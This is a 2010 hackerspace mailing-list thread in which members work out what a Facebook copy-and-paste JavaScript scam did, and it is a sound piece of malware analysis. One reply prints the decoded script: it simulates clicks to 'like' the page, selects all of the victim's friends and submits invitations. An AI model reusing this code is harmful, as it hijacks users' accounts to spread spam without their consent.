[Noisebridge-discuss] What does this Facebook javascript malware do?

Alexander alxndr at gmail.com
Fri May 7 19:28:15 UTC 2010 

I saw it get up to about 2200 fans before it got taken down.

On Fri, May 7, 2010 at 12:12, Lee Sonko <lee at lee.org> wrote:
> Brian, she will be much relieved to find out that this malware had no
> malicious payload.
>
>
> I see that Facebook removed the page as of noon. 1,600 infections in 3 hours
> via social engineering, a dumb Facebook page and a little snippet of
> javascript. Not bad.
>
>
>
>
>
> -----Original Message-----
> From: Brian Ferrell [mailto:endenizen at gmail.com]
> Sent: Friday, May 07, 2010 11:56 AM
> To: Lee Sonko
> Cc: NoiseBridge Discuss
> Subject: Re: [Noisebridge-discuss] What does this Facebook javascript
> malware do?
>
> For the curious... DON'T RUN THIS!
>
> Looks like it does just what you expect - 'likes' the app and suggests
> it to all your friends.
>
> document.getElementById('app117185681648577_cWsFYs').style = 'hidden';
> document.getElementById('app117185681648577_TPCCax').innerHTML =
> document.getElementById('app117185681648577_YbDOrx').value;
> s = document.getElementById('suggest');
> m = document.getElementById('likeme');
> c = document.createEvent('MouseEvents');
> c.initEvent('click', true, true);
> s.dispatchEvent(c);
>
> setTimeout(function() {
>  fs.select_all();
> }, 5000);
>
> setTimeout(function() {
>  SocialGraphManager.submitDialog('sgm_invite_form',
> '/ajax/social_graph/invite_dialog.php');
> }, 5000);
>
> setTimeout(function() {
>  m.dispatchEvent(c);
>  document.getElementById('app117185681648577_wNPOwN').innerHTML =
> document.getElementById('app117185681648577_djzaef').value;
> }, 5000);
>
> On Fri, May 7, 2010 at 11:30, Lee Sonko <lee at lee.org> wrote:
>> A friend received this Facebook malware. It told her to copy and paste the
>> malware below into her browser. She did :-(
>>
>>
>>
>> She tells me that it then pulled up a Facebook page and invited all her
>> Facebook friends to the malware page.
>>
>>
>>
>> Can you, the javascript enabled hacker tell what it does? I'm guessing the
>> RexExp runs a substitution cipher on that long string of characters but
> I'm
>> lost from there.
>>
>>
>>
>> I've been watching the number of "People Like This" on the page grow from
>> 1,000 to 1,500 in the past 20 minutes.   :-(
>>
>>
>>
>>
>>
>> Find it at http://lee.org/temp/malware.txt
>>
>>
>>
>>
>>
>> Lee
>>
>> _______________________________________________
>> Noisebridge-discuss mailing list
>> Noisebridge-discuss at lists.noisebridge.net
>> https://www.noisebridge.net/mailman/listinfo/noisebridge-discuss
>>
>>
>
> _______________________________________________
> Noisebridge-discuss mailing list
> Noisebridge-discuss at lists.noisebridge.net
> https://www.noisebridge.net/mailman/listinfo/noisebridge-discuss
>

More information about the Noisebridge-discuss mailing list